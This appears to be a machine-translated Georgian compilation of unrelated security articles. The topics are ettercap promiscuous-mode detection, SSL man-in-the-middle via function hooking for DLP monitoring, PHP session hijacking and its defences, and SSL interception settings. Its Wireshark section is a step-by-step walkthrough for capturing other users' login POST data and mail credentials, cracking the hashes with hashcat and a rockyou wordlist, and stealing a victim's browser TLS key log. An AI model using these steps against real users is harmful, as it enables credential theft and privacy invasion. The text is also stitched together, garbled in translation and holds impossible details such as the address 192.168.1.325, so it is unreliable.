ის ცდილობს გაარკვიოს, არის თუ არა ვინმე ყნოსვის (უსმენს) პრომისკუურ რეჟიმში. ის აგზავნის ორ განსხვავებულ ცუდად ჩამოყალიბებულ arp მოთხოვნას ჰოსტის სიის თითოეულ სამიზნესთან და ელოდება პასუხებს. თუ პასუხი მოვიდა სამიზნე ჰოსტისგან, მეტ-ნაკლებად სავარაუდოა, რომ სამიზნეს აქვს ქსელის ბარათი პრომისკუურ რეჟიმში. შესაძლოა ცრუ სიგნალიზაცია წარმოქმნას. თქვენ შეგიძლიათ გაუშვათ ის, როგორც საიდან ბრძანების ხაზიან დანამატების მენიუდან. ვინაიდან ის უსმენს arp პასუხებს, უკეთესი იქნება, თუ მათ არ გამოიყენებთ arp მოთხოვნების გაგზავნისას.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

ორი წარმატებით გამოცნობის მაგალითი ქსელის ბარათებიპრომისკუურ რეჟიმში:

გაფართოება

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 საავტორო უფლება 2001-2015 Ettercap განვითარების გუნდი მოსმენა: eth0 -> 08:00:27:AF:30:B9 192.168.1.325/25. 27ff:feaf:30b9/64 SSL დისექციას სჭირდება მოქმედი "redir_command_on" სკრიპტი etter.conf ფაილში Ettercap შეიძლება არ იმუშაოს სწორად. /proc/sys/net/ipv6/conf/eth0/use_tempaddr არ არის დაყენებული 0-ზე. პრივილეგიები დაეცა EUID 65534 EGID 65534... 33 დანამატი 42 პროტოკოლის დისექტორი 57 პორტი დაკვირვებული 20388 mac გამყიდველი თითის ანაბეჭდი 18 OS6 ცნობილი : სკრიპტები არ იყო მითითებული, არ დაიწყო! 255 ჰოსტის რანდომიზაცია სკანირებისთვის... მთელი ქსელის ნიღბის სკანირება 255 ჰოსტისთვის... * |============================= ==================================>

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 საავტორო უფლება 2001-2015 Ettercap განვითარების გუნდი მოსმენა: eth0 -> 08:00:27:AF:30:B9 192.168.1.325/25. 27ff:feaf:30b9/64 SSL დისექციას სჭირდება მოქმედი "redir_command_on" სკრიპტი etter.conf ფაილში Ettercap შეიძლება არ იმუშაოს სწორად. /proc/sys/net/ipv6/conf/eth0/use_tempaddr არ არის დაყენებული 0-ზე. პრივილეგიები დაეცა EUID 65534 EGID 65534... 33 დანამატი 42 პროტოკოლის დისექტორი 57 პორტი დაკვირვებული 20388 mac გამყიდველი თითის ანაბეჭდი 18 OS6 ცნობილი : სკრიპტები არ იყო მითითებული, არ დაიწყო! 255 ჰოსტის რანდომიზაცია სკანირებისთვის... მთელი ქსელის ნიღბის სკანირება 255 ჰოსტისთვის... * |============================= ==================================>| 100.00% 5 ჰოსტი დაემატა ჰოსტების სიას... იწყება ერთიანი sniffing... მხოლოდ ტექსტი გააქტიურებულია ინტერფეისი... დააჭირეთ ღილაკს "h" inline დახმარებისთვის Search_promisc მოდულის გააქტიურება... search_promisc: ვეძებთ Promisc NIC-ებს... ნაკლებად, ალბათ, sniffing NIC-ებს : - 192.168.1.36 - 192.168.1.34, სავარაუდოდ, სნიფი NIC-ები: - NONE იხურება ტექსტური ინტერფეისი... მთავრდება ettercap... ლუას გასუფთავება დასრულდა! ერთიანი ყნოსვა შეწყდა.

7.9 ssl ზოლები

SSL mitm შეტევის დროს, ettercap ცვლის რეალურ SSL სერთიფიკატს საკუთარი. ყალბი სერტიფიკატი იქმნება ფრენაზე და ყველა ველი ივსება სერვერის მიერ წარმოდგენილი რეალური სერტიფიკატის შესაბამისად.

  • (62%)
  • (56.5%)
  • (შემთხვევითი - 0.2%)
  • ინფორმაციული უსაფრთხოების ამოცანებს შორის სულ უფრო მნიშვნელოვანი ხდება კონფიდენციალური ინფორმაციის გაჟონვის წინააღმდეგ ბრძოლა. ღია წყაროების მიხედვით, 2016 წლის განმავლობაში გაჟონვის რაოდენობა 86%-ით გაიზარდა და 47%-ს შეექმნა ეს პრობლემა. რუსული კომპანიებიძალიან განსხვავებული პროფილები. ეს პრობლემა მოგვარებულია DLP (Data Loss Prevention) კლასის სისტემების გამოყენებით. სტატიაში განხილულია ასეთი სისტემის ერთ-ერთი მოდულის დანერგვა, რომელიც უზრუნველყოფს SSL/TLS ტრაფიკის მონიტორინგს Windows სისტემის ფუნქციების ჩაჭრით.

    გაჟონვის წინააღმდეგ ბრძოლა მნიშვნელოვანი ინფორმაციამოითხოვს ქსელის ტრაფიკის მონიტორინგს. ეს გულისხმობს ქსელში გადაცემული ყველა მონაცემის ანალიზს სხვადასხვა გზით, მათ შორის SSL/TLS პროტოკოლით დაშიფრული მონაცემების ჩათვლით.

    SSL/TLS პროტოკოლით გადაცემული მონაცემების აღკვეთა შესაძლებელია man-in-the-middle შეტევის (ან მოკლედ MITM) გამოყენებით. ამისათვის მონიტორინგის სისტემა მოქმედებს როგორც შუამავალი კლიენტსა და სერვერს შორის. კლიენტისგან მიღებული ყველა ინფორმაცია ჯერ შუამავალში გადადის (ანუ, მონიტორინგის სისტემაში) და შემდეგ გადაეგზავნება სერვერს. პირიქით, ყველა ინფორმაცია სერვერიდან ჯერ აღწევს შუამავალს და შემდეგ გადაეგზავნება კლიენტს.

    ნახ 1. შეტევა კაცი შუაში


    შუამავლის „დანერგვის“ უმარტივესი გზა ემყარება შუალედური სერვერის (პროქსი სერვერის) გამოყენებას. ამ შემთხვევაში კლიენტი და სერვერი პირდაპირ არ ურთიერთობენ. კლიენტი აგზავნის ყველა მოთხოვნას შუალედურ სერვერზე, რომელიც გადასცემს მათ რეალურ სერვერზე. ანალოგიურად, რეალური სერვერი აგზავნის პასუხებს შუალედურ სერვერზე, რომელიც გადასცემს მათ კლიენტს.

    თუ მონაცემები გადადის SSL/TLS-ის გამოყენებით, მაშინ ორივე კავშირი (კლიენტიდან შუალედურ სერვერზე და შუალედური სერვერიდან რეალურ სერვერზე) უსაფრთხოა. ორივე კავშირი იყენებს საკუთარ სერტიფიკატს და საკუთარ პირად გასაღებს. შუალედურ სერვერს აქვს პირადი გასაღებები ორივე კავშირისთვის და „ხელახლა შიფრავს“ მონაცემებს: ის იღებს დაშიფრულ მონაცემებს, შიფრავს მათ და შიფრავს სხვა გამოყენებით. პირადი გასაღებიდა ბოლოს აგზავნის. ამრიგად, შუალედურ სერვერს აქვს ყველა გადაცემული მონაცემი დაშიფრული ფორმით.

    დადგმის სერვერის გამოყენებას ორი მნიშვნელოვანი მინუსი აქვს. პირველ რიგში, ეს შეიძლება იყოს ძალიან შესამჩნევი საბოლოო მომხმარებლისთვის. მეორეც, თუ შუალედური სერვერი მუშაობს კლიენტის მანქანაზე, მაშინ OS დონეზე ღია ქსელის კავშირების რაოდენობა გაორმაგდება. ეს ქმნის დამატებით დატვირთვას OS ქსელის ქვესისტემაზე და შეიძლება გამოიწვიოს წარუმატებლობა იმ შემთხვევებში, როდესაც ეს საჭიროა დიდი რაოდენობაერთდროულად გახსნა ქსელის კავშირები.

    სისტემის ფუნქციური ზარების ჩარევა უზრუნველყოფს უფრო ელეგანტურ და ფრთხილ გზას ადამიანის შუაგულში განსახორციელებლად. ამისთვის, მონიტორინგის სისტემა უერთდება უკვე გაშვებულ პროცესს და ცვლის სისტემის ფუნქციებს, რომლებიც გამოიყენება ქსელის ურთიერთქმედების დროს. გარდა ამისა, როდესაც პროცესი წვდომას აწვდის დაჭერილი სისტემის ფუნქციებს, კონტროლი გადადის მონიტორინგის სისტემაზე. ამრიგად, ის მთლიანად აკონტროლებს პროცესის ქსელურ აქტივობებს და შეუძლია შუამავალი იყოს პროცესის ურთიერთქმედებაში დისტანციურ სერვერთან.


    ნახაზი 2. შეტევა Man-in-the-Middle შუამავლის ბიბლიოთეკის გამოყენებით, რომელიც წყვეტს სისტემის ფუნქციებს


    SSL/TLS ტრაფიკის მონიტორინგის სისტემა ამოქმედდა გამოყენებით სამი მარტივინაბიჯები:
    1. დაუკავშირდით მითითებულ კლიენტის პროცესს (გამოყენებით სტანდარტული მახასიათებლები OS).
    2. დინამიური შუამავალი ბიბლიოთეკის ჩატვირთვა, რომელიც ახორციელებს საკუთარ ქსელურ ურთიერთქმედების ფუნქციებს.
    3. ქსელის ურთიერთქმედების ფუნქციების ჩარევის კონფიგურაცია ისე, რომ ამ ფუნქციების გამოძახებისას ზარი განხორციელდეს არა სისტემის ფუნქციებზე, არამედ ჩატვირთულ ბიბლიოთეკაში განხორციელებულ ფუნქციებზე.

    მედიაციის ბიბლიოთეკას აქვს იგივე შესაძლებლობები, რაც შუალედურ სერვერს. ამრიგად, კლიენტის აპლიკაციიდან მთელი ინფორმაცია ჯერ გადადის შუამავალ ბიბლიოთეკაში, შემდეგ კი გადაგზავნილია რეალურ სერვერზე. პირიქით, რეალური სერვერიდან მთელი ინფორმაცია ჯერ შუამავალ ბიბლიოთეკაში გადადის და შემდეგ გადაეგზავნება აპლიკაციას.


    ნახ 3. მონაცემთა აღკვეთა შუამავალი ბიბლიოთეკის მიერ


    სერვერთან ურთიერთობისთვის შუამავალი ბიბლიოთეკა იყენებს სისტემის სტანდარტულ ფუნქციებსა და მექანიზმებს. თუ ინფორმაცია გადაცემულია SSL/TLS გამოყენებით, მაშინ გამოიყენება უსაფრთხო კავშირი, რომელსაც ადგენს შუამავალი ბიბლიოთეკა. კავშირის დამყარების შემდეგ, შუამავალმა ბიბლიოთეკამ „იცის“ პირადი გასაღები, რომელიც გამოიყენება მონაცემთა დაშიფვრისთვის/გაშიფვრისთვის.

    კლიენტის აპლიკაციასთან ურთიერთქმედება ოდნავ განსხვავებული გზით ხდება. პროქსი ბიბლიოთეკა იღებს კონტროლს, როდესაც კლიენტის აპლიკაცია გამოიძახებს ქსელის რომელიმე ფუნქციას. თუ გამოძახებულ ფუნქციას აქვს შეყვანის არგუმენტები, მაშინ შუა პროგრამის ბიბლიოთეკა მიიღებს ამ არგუმენტების მნიშვნელობებს. შემდეგი, შუამავალი ბიბლიოთეკა "აბაძავს" ამ ფუნქციის მოქმედებას და, თუ ფუნქციას აქვს გამომავალი არგუმენტები, მაშინ შუამავალი ბიბლიოთეკა წარმოქმნის ამ არგუმენტების მნიშვნელობებს. ეს ლოგიკა ვრცელდება აბსოლუტურად ყველა ჩაჭრილ ფუნქციაზე, მათ შორის კავშირის დამყარების, მონაცემთა გადაცემის და სერვერის პასუხების მიღების ფუნქციებზე.

    შუამავალი ბიბლიოთეკა ერთდროულად ურთიერთქმედებს როგორც კლიენტის აპლიკაციასთან, ასევე დისტანციურ სერვერთან. ოპერაციული ლოგიკა დამოკიდებულია კლიენტის აპლიკაციის მიერ შესრულებულ მოქმედებებზე:

    1. ახალი ქსელური კავშირის დამყარება ხდება შემდეგნაირად:
    - აპლიკაცია იძახებს საჭირო სისტემის ფუნქციას;
    - ზარი გადაეცემა შუამავალ ბიბლიოთეკას;
    - შუამავალი ბიბლიოთეკა ამყარებს კავშირს სერვერთან და დამოუკიდებლად ასრულებს SSL/TLS პროტოკოლით გათვალისწინებულ ყველა მოქმედებას: სერვერის სერთიფიკატის შემოწმება, საკუთარი სერთიფიკატის გაგზავნა, ხელის ჩამორთმევა, პირადი გასაღების გენერირება და ა.შ.
    - შუამავალი ბიბლიოთეკა უბრუნებს კონტროლს აპლიკაციას;
    - აპლიკაცია ასრულებს ყველა მოქმედებას, რომელიც საჭიროა კავშირის დასამყარებლად SSL/TLS პროტოკოლით, ქსელის საკომუნიკაციო ფუნქციების გამოძახებით. შუამავლების ბიბლიოთეკა წყვეტს ყველა ამ ზარს, მაგრამ არ აკეთებს ზარებს რეალურ სერვერზე, მაგრამ "პასუხობს" თავად აპლიკაციას. აპლიკაციის თვალსაზრისით, ყველაფერი ისე გამოიყურება, თითქოს რეალურ სერვერთან არის ურთიერთქმედება (მათ შორის, ხელის ჩამორთმევა და პირადი გასაღების გენერაცია).
    ამ ქმედებების შედეგად შუამავალ ბიბლიოთეკას აქვს SSL/TLS პროტოკოლის ერთდროულად ორი პირადი გასაღები. ერთი გასაღები გამოიყენება აპლიკაციასთან ურთიერთობისთვის, მეორე კი სერვერთან ურთიერთობისთვის.

    2. სერვერზე მონაცემების გადასატანად აპლიკაცია იძახებს სისტემის ფუნქციას. უკვე დაშიფრული მონაცემები გადაეცემა ფუნქციის შეყვანას. Middleware ბიბლიოთეკა წყვეტს ამ ზარს და აკეთებს შემდეგს:
    - შიფრავს გადაცემულ მონაცემებს აპლიკაციასთან კავშირის დამყარებისას მიღებული პირადი გასაღების გამოყენებით;
    - შიფრავს მიღებულ მონაცემებს სერვერთან კავშირის დამყარებისას მიღებული პირადი გასაღების გამოყენებით;
    - აგზავნის დაშიფრულ მონაცემებს სერვერზე.

    3. სერვერიდან მონაცემების მიღება ხდება ანალოგიურად, მაგრამ ში საპირისპირო მიზნით. აპლიკაცია იძახებს მონაცემების მისაღებად ფუნქციას, ხოლო შუა პროგრამის ბიბლიოთეკა წყვეტს ამ ზარს და აკეთებს შემდეგს:
    - იღებს მონაცემთა ნაწილს სერვერიდან;
    - შიფრავს მიღებულ მონაცემებს სერვერთან კავშირის დამყარებისას მიღებული პირადი გასაღების გამოყენებით;
    - შიფრავს მიღებულ მონაცემებს აპლიკაციასთან კავშირის დამყარებისას მიღებული პირადი გასაღების გამოყენებით;
    - აბრუნებს დაშიფრულ მონაცემებს (ან მის ნაწილს) ფუნქციის შედეგად.

    4. როდესაც კავშირი იკარგება, აპლიკაცია იძახებს შესაბამის ფუნქციას. Middleware ბიბლიოთეკა წყვეტს ამ ზარს, ხურავს კავშირს სერვერთან, შლის მის შიდა სტრუქტურებს და უბრუნებს კონტროლს აპლიკაციას.

    მოძრაობის ჩარევის შემოთავაზებული მეთოდის ტექნიკურ განხორციელებას არაერთი სირთულე აქვს. აპლიკაციას შეუძლია გამოიყენოს სხვადასხვა გზებიქსელის ურთიერთქმედება (დაბლოკვის და არაბლოკირების რეჟიმი, ასინქრონული მუშაობის რეჟიმი და ა.შ.). სრულფასოვანი მონიტორინგის სისტემაში აუცილებელია აპლიკაციის ქცევის ყველა შესაძლო სცენარის გათვალისწინება. წინააღმდეგ შემთხვევაში, მონიტორინგის სისტემა უმოქმედო იქნება.

    უფრო სერიოზული პრობლემა ის არის, რომ შუამავალი ბიბლიოთეკის არსებობა შეიძლება შესამჩნევი იყოს ძლიერი მომხმარებლისთვის. პროქსი ბიბლიოთეკა "რეაგირებს" აპლიკაციას სერვერის სახელით, მაგრამ იყენებს საკუთარ ხელმოწერილ სერთიფიკატს. ბევრი კლიენტის აპლიკაცია (როგორიცაა ინტერნეტ ბრაუზერები) სწორად მუშაობს სერვერის მიერ ხელმოწერილი სერტიფიკატით, მაგრამ ყოველთვის გაძლევთ საშუალებას ნახოთ იგი. თუ მომხმარებელი ხედავს ხელმოწერილ სერთიფიკატს, რომელსაც არაფერი აქვს საერთო რეალურ სერვერთან, მაშინ მომხმარებელს შეუძლია ეჭვი შეიტანოს შუამავლის არსებობაზე.

    ზოგადად, TLS/SSL ტრაფიკის მონიტორინგის შემოთავაზებული მეთოდი ძალზე ეფექტურია რამდენიმე მიზეზის გამო. პირველ რიგში, ბიბლიოთეკა მოქმედებს როგორც სრულფასოვანი შუამავალი აპლიკაციასა და სერვერს შორის. ის სრულად აკონტროლებს აპლიკაციის მთელ ქსელურ აქტივობას და ყველა გაგზავნილ/მიღებულ მონაცემს. მეორეც, შუამავალი ბიბლიოთეკის დანერგვა არ საჭიროებს მნიშვნელოვანს სისტემის რესურსები. და ბოლოს, შუამავალი ბიბლიოთეკის არსებობა შესამჩნევია მხოლოდ გამოცდილი მომხმარებლისთვის.

    თქვენი სესიის გატეხვისა და ქურდობისგან დაცვის გზები

    ინტერნეტის საიტების უმეტესობა ღიაა ჰაკერების გარე გავლენისთვის. ფართომასშტაბიანი, ძვირადღირებული ინტერნეტ პროექტებიც კი გატეხილია: ისინი ტოვებენ კვალს ან იპარავენ მონაცემთა ბაზას. შედეგად, ზარალდება რესურსის მფლობელი, ისევე როგორც ვიზიტორები.

    ჰაკერების პრობლემების თავიდან ასაცილებლად, განვითარების პროცესში მთელი რიგი ზომები უნდა იქნას მიღებული. საიტის ექსპლუატაციის დროს საჭიროა გარკვეული პრევენციული ქმედებების განხორციელება.

    წინა სტატიებში მე ვაჩვენე, თუ როგორ სრულდება სერვერები. დღეს ვისაუბრებთ ჰაკერების მიერ სესიების ჩაჭრასა და დაცვაზე.

    საიტის სესია

    PHP ალბათ ყველაზე გავრცელებული სერვერის პროგრამირების ენაა ვებსაიტებისთვის. PHP-ში საიტის სესია იწყება session_start() ბრძანების გამოყენებით. დაწყებამდე შეგიძლიათ მიუთითოთ დამატებითი პარამეტრები. სესია ჩვეულებრივ ინახავს მნიშვნელოვან პერსონალურ ინფორმაციას მომხმარებლის შესახებ: შესვლა, სახელი, პაროლი,...

    სესიის გატაცება

    სესიის ID-ის შესანახად 2 გზა არსებობს: ქუქიებში და მისამართების ზოლში. პირველი ვარიანტი უფრო სანდოა, ვიდრე მეორე, მაგრამ ორივე გატეხილია ამა თუ იმ ხარისხით. ამ ტიპის ჰაკერს ეწოდება სესიის გატაცება.

    დაე, იდენტიფიკატორი შეინახოს საიტის url-ში. შესული ვიზიტორი, რომელიც დადის თქვენი საიტის გვერდებზე, გადაწყვეტს ვინმესთან ერთად. ბმულის გამოქვეყნებისას ის აძლევს ბმულს თავისი სესიის ID-ით. თუ საიტს არ გააჩნია უსაფრთხოების დამატებითი მეთოდები, მაშინ ასეთ ბმულზე დაწკაპუნებით ახალი ვიზიტორი უკვე შესულია, როგორც პირველი მომხმარებელი, თუ სესია ჯერ არ დასრულებულა. შემდეგ გააკეთე რაც გინდა საიტზე წესებით დაშვებულ ფარგლებში.

    ქუქი-ფაილების შემთხვევაში, ყველაფერი უფრო რთულია, მაგრამ ყველაფრის ჩაჭრა ასევე საკმაოდ მარტივია. ბევრი საიტი არ ფილტრავს ბრაუზერის სკრიპტებს, როდესაც მომხმარებლები აქვეყნებენ ინფორმაციას. პოტენციური თავდამსხმელი ათავსებს ასეთ სკრიპტს გვერდზე. შესული ვიზიტორი მოდის გვერდზე... სკრიპტი კითხულობს ქუქიების მნიშვნელობას ან მისამართების ზოლს და გადასცემს სესიის იდენტიფიკატორს სხვა საიტზე. კიდევ ერთი საიტი ეკუთვნის ჰაკერს. ყველაფერი დანარჩენი მარტივია. ქუქი-ფაილი გაყალბებულია ან შეყვანილია ვებსაიტის გვერდის მისამართი საჭირო სესიის იდენტიფიკატორით.

    სესიის გატეხვა

    სესიის დაწყებისას, სესიის ფაილები იქმნება დროებით დირექტორიაში. ეს ფაილები ინახავს ინფორმაციას. თუ გამოიყენება, მაშინ, ჩვეულებრივ, სესიების შესანახად დროებითი საქაღალდე საერთოა სერვერის ყველა საიტისთვის. შემდეგი, სესიის მონაცემები იკითხება გარკვეული გზით თქვენი სკრიპტით. ამისათვის თავდამსხმელს უნდა ჰქონდეს ანგარიში იმავე სერვერზე. შედეგად, თუ სესია ინახავს ვებსაიტის პაროლს ან საკრედიტო ბარათის ნომერს cvv კოდით, მაშინ ეს ყველაფერი სასარგებლო ინფორმაციათავდამსხმელის ხელში მოხვდება.

    დაცვა სესიის მონაცემების გატეხვისგან
    • შეინახეთ სესია ქუქიებში. წაღება უფრო რთულია.
    • დააკავშირეთ სესია კომპიუტერის IP მისამართთან. სხვა IP-დან შესვლისას ახალი სესია იქმნება სკრიპტის პარამეტრების მიხედვით.
    • დააკავშირეთ სესია ბრაუზერის მომხმარებლის აგენტთან. სხვა ბრაუზერიდან შესვლისას სესიის გადატვირთვა ხდება.
    • სესიაზე გადაცემული პარამეტრების დაშიფვრა. თუ თავდამსხმელი მიიღებს სესიის ფაილს, ის ვერ წაიკითხავს. თუმცა, თუ თქვენ გაქვთ გარკვეული უნარები, ასევე შესაძლებელია სესიის გაშიფვრა.
    • შეინახეთ სესიის ID-ები ცალკე საქაღალდე. php-ში არის ბრძანება ამისათვის: session_save_path($path_to_dir). იგივე პარამეტრი შეიძლება იყოს მითითებული php.ini ფაილში. პარამეტრს ეწოდება session.save_path.
    • გამოიყენეთ session_set_save_handler() php-ში სესიის შენახვის წესის უგულებელყოფისთვის. და დაწყებული PHP 5.4-დან, შეგიძლიათ გადასცეთ SessionHandlerInterface ტიპის ობიექტი session_set_save_handler(-ს).

    ბევრ მომხმარებელს არ ესმის, რომ შესვლისა და პაროლის შევსებით დახურულ ინტერნეტ რესურსზე დარეგისტრირების ან ავტორიზაციისას და ENTER-ის დაჭერით, ამ მონაცემების ადვილად ჩარევა შესაძლებელია. ძალიან ხშირად ისინი გადაცემულია ქსელში დაუცველი ფორმით. ამიტომ, თუ საიტი, რომელშიც ცდილობთ შესვლას, იყენებს HTTP პროტოკოლს, მაშინ ძალიან ადვილია ამ ტრაფიკის აღება, Wireshark-ის გამოყენებით მისი ანალიზი და შემდეგ პაროლის მოსაძებნად და გაშიფვრისთვის სპეციალური ფილტრების და პროგრამების გამოყენება.

    პაროლების ჩასაჭრელად საუკეთესო ადგილია ქსელის ბირთვი, სადაც ყველა მომხმარებლის ტრაფიკი მიდის დახურულ რესურსებზე (მაგალითად, ფოსტაზე) ან როუტერის წინ ინტერნეტში შესასვლელად, გარე რესურსებზე რეგისტრაციისას. ჩვენ ვაყენებთ სარკეს და მზად ვართ თავი ჰაკერად ვიგრძნოთ.

    ნაბიჯი 1. დააინსტალირეთ და გაუშვით Wireshark ტრაფიკის დასაფიქსირებლად

    ზოგჯერ ამისთვის საკმარისია მხოლოდ ინტერფეისის არჩევა, რომლის მეშვეობითაც ვგეგმავთ ტრაფიკის აღებას და დააწკაპუნეთ Start ღილაკზე. ჩვენს შემთხვევაში, ჩვენ ვიღებთ უკაბელო ქსელის საშუალებით.

    სატრანსპორტო მოძრაობის აღება დაიწყო.

    ნაბიჯი 2. გადაღებული POST ტრაფიკის გაფილტვრა

    ჩვენ ვხსნით ბრაუზერს და ვცდილობთ შევიდეთ რომელიმე რესურსში მომხმარებლის სახელისა და პაროლის გამოყენებით. ავტორიზაციის პროცესის დასრულების და საიტის გახსნის შემდეგ, ჩვენ ვწყვეტთ ტრაფიკის აღებას Wireshark-ში. შემდეგი, გახსენით პროტოკოლის ანალიზატორი და ნახეთ პაკეტების დიდი რაოდენობა. ეს არის ის, სადაც IT პროფესიონალების უმეტესობა უარს ამბობს, რადგან არ იციან რა გააკეთონ შემდეგ. მაგრამ ჩვენ ვიცით და გვაინტერესებს კონკრეტული პაკეტები, რომლებიც შეიცავს POST მონაცემები, რომლებიც წარმოიქმნება ჩვენს ადგილობრივ აპარატზე, ეკრანზე ფორმის შევსებისას და იგზავნება დისტანციურ სერვერზე, როდესაც ბრაუზერში ვაწკაპუნებთ ღილაკზე „შესვლა“ ან „ავტორიზაცია“.

    ჩვენ შევიყვანთ სპეციალურ ფილტრს ფანჯარაში დაჭერილი პაკეტების საჩვენებლად: http. მოთხოვნა. მეთოდი == "POST"

    და ჩვენ ვხედავთ, ათასობით პაკეტის ნაცვლად, მხოლოდ ერთს იმ მონაცემებით, რომელსაც ჩვენ ვეძებთ.

    ნაბიჯი 3. იპოვნეთ მომხმარებლის შესვლა და პაროლი

    სწრაფად დააწკაპუნეთ მარჯვენა ღილაკით და მენიუდან აირჩიეთ Follow TCP Steam


    ამის შემდეგ, ტექსტი გამოჩნდება ახალ ფანჯარაში, რომელიც აღადგენს გვერდის შინაარსს კოდით. მოდი ვიპოვოთ ველები „პაროლი“ და „მომხმარებელი“, რომლებიც შეესაბამება პაროლს და მომხმარებლის სახელს. ზოგიერთ შემთხვევაში, ორივე ველი ადვილად იკითხება და არც კი დაშიფრული, მაგრამ თუ ჩვენ ვცდილობთ ტრაფიკის აღებას ძალიან ცნობილ რესურსებზე წვდომისას, როგორიცაა Mail.ru, Facebook, Vkontakte და ა.შ., მაშინ პაროლი დაშიფრული იქნება:

    HTTP/1.1 302 ნაპოვნია

    სერვერი: Apache/2.2.15 (CentOS)

    X-Powered-By: PHP/5.3.3

    P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

    Set-Cookie: პაროლი=; იწურება = ხუთ, 07-ნოე-2024 23:52:21 GMT; გზა =/

    ადგილმდებარეობა: loggedin.php

    შინაარსი-სიგრძე: 0

    კავშირი: დახურვა

    Content-Type: text/html; charset=UTF-8

    ამრიგად, ჩვენს შემთხვევაში:

    მომხმარებლის სახელი: networkguru

    პაროლი:

    ნაბიჯი 4. განსაზღვრეთ კოდირების ტიპი პაროლის გასაშიფრად

    მაგალითად, გადადით ვებსაიტზე http://www.onlinehashcrack.com/hash-identification.php#res და შეიყვანეთ ჩვენი პაროლი საიდენტიფიკაციო ფანჯარაში. მე მომცეს კოდირების პროტოკოლების სია პრიორიტეტის მიხედვით:

    ნაბიჯი 5. მომხმარებლის პაროლის გაშიფვრა

    ამ ეტაპზე შეგვიძლია გამოვიყენოთ ჰეშკატის პროგრამა:

    ~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

    გამოსავალზე მივიღეთ გაშიფრული პაროლი: simplepassword

    ამრიგად, Wireshark-ის დახმარებით ჩვენ შეგვიძლია არა მხოლოდ პრობლემების გადაჭრა აპლიკაციებისა და სერვისების ფუნქციონირებაში, არამედ ვცდილობთ თავი ჰაკერად, ჩავჭრათ პაროლები, რომლებსაც მომხმარებლები შეაქვთ ვებ ფორმებში. ასევე შეგიძლიათ გაიგოთ პაროლები საფოსტო ყუთებიმომხმარებლები, რომლებიც იყენებენ მარტივ ფილტრებს საჩვენებლად:

    • POP პროტოკოლი და ფილტრი ასე გამოიყურება: pop.request.command == "USER" || pop.request.command == "PASS"
    • IMAP პროტოკოლი და ფილტრი იქნება: imap.request შეიცავს "login"-ს
    • პროტოკოლი არის SMTP და თქვენ უნდა შეიყვანოთ შემდეგი ფილტრი: smtp.req.command == "AUTH"

    და უფრო სერიოზული კომუნალური საშუალებები კოდირების პროტოკოლის გაშიფვრისთვის.

    ნაბიჯი 6: რა მოხდება, თუ ტრაფიკი დაშიფრულია და იყენებს HTTPS-ს?

    ამ კითხვაზე პასუხის რამდენიმე ვარიანტი არსებობს.

    ვარიანტი 1. დაკავშირება მომხმარებლისა და სერვერის კავშირის გაწყვეტისას და აიღეთ ტრაფიკი კავშირის დამყარების მომენტში (SSL Handshake). როდესაც კავშირი დამყარდება, სესიის კლავიშის ჩაჭრა შესაძლებელია.

    ვარიანტი 2: შეგიძლიათ გაშიფროთ HTTPS ტრაფიკი Firefox-ის ან Chrome-ის მიერ ჩაწერილი სესიის გასაღების ჟურნალის ფაილის გამოყენებით. ამისათვის ბრაუზერი უნდა იყოს კონფიგურირებული, რომ ჩაწეროს ეს დაშიფვრის გასაღებები ჟურნალის ფაილში (FireFox დაფუძნებული მაგალითი) და თქვენ უნდა მიიღოთ ეს ჟურნალის ფაილი. არსებითად, თქვენ უნდა მოიპაროთ სესიის გასაღების ფაილი მყარი დისკისხვა მომხმარებელი (რაც უკანონოა). კარგად, მაშინ დააფიქსირეთ ტრაფიკი და გამოიყენეთ მიღებული გასაღები მის გასაშიფრად.

    დაზუსტება. ჩვენ ვსაუბრობთ იმ ადამიანის ვებ ბრაუზერზე, რომლის პაროლის მოპარვას ისინი ცდილობენ. თუ ვგულისხმობთ საკუთარი HTTPS ტრაფიკის გაშიფვრას და გვინდა ვივარჯიშოთ, მაშინ ეს სტრატეგია იმუშავებს. თუ თქვენ ცდილობთ სხვა მომხმარებლების HTTPS ტრაფიკის გაშიფვრას მათ კომპიუტერებზე წვდომის გარეშე, ეს არ იმუშავებს - ეს არის დაშიფვრა და კონფიდენციალურობა.

    1 ან 2 ვარიანტის მიხედვით გასაღებების მიღების შემდეგ, თქვენ უნდა დაარეგისტრიროთ ისინი WireShark-ში:

  • გადადით მენიუში Edit - Preferences - Protocols - SSL.
  • დააყენეთ დროშა „SSL ჩანაწერების ხელახლა შეკრება, რომლებიც მოიცავს მრავალ TCP სეგმენტს“.
  • "RSA გასაღებების სია" და დააწკაპუნეთ რედაქტირება.
  • შეიყვანეთ მონაცემები ყველა ველში და ჩაწერეთ ბილიკი ფაილში გასაღებით
  • როდესაც ჩართულია, მთელი ტრაფიკი (დაშიფრული და დაუშიფრული) ან მხოლოდ დაშიფრული აგენტი იყენებს SSL სერთიფიკატის გაყალბების ტექნოლოგიას, რათა უზრუნველყოს დაცულ ვებ სესიებში გადაცემული მონაცემების თვალთვალი. სერვერთან უსაფრთხო კავშირის დამყარებისას, აგენტი ცვლის ორიგინალური სერვერის სერთიფიკატს იმავე სახელწოდებით, მაგრამ გაცემული აგენტის ძირეული სერტიფიკატით. სისტემა საშუალებას გაძლევთ გამოიყენოთ როგორც წინასწარ დაინსტალირებული, ასევე მომხმარებლის მიერ შექმნილი სერთიფიკატი ხელმოწერის უფლებამოსილებით, როგორც root სერთიფიკატი.

    სისტემა საშუალებას გაძლევთ ხელით დააინსტალიროთ გარკვეული სერთიფიკატები ჩანაცვლებისთვის შესაბამისი სერვერების (საიტების, პროგრამების) სესიების ჩარევისას სერთიფიკატის სერვერთან დაკავშირების გზით.

    ზოგიერთ შემთხვევაში, არაორიგინალური სერტიფიკატის გამოყენებამ შეიძლება შეუძლებელი გახადოს სერვერთან დაშიფრული კავშირის დამყარება. ამ შემთხვევაში აუცილებელია შესაბამისი სერვერების გამორიცხვა ჩარევისგან, ე.ი. აკრძალოს SSL სერთიფიკატების ჩანაცვლება ასეთ სერვერებთან დაკავშირებისას. ეს აღადგენს ასეთი საიტების ან პროგრამების ფუნქციონირებას, მაგრამ მათთვის დაშიფრული ტრაფიკი არ იქნება ჩასმული.

    SSL ტრაფიკის ჩარევის კონფიგურაციისთვის:

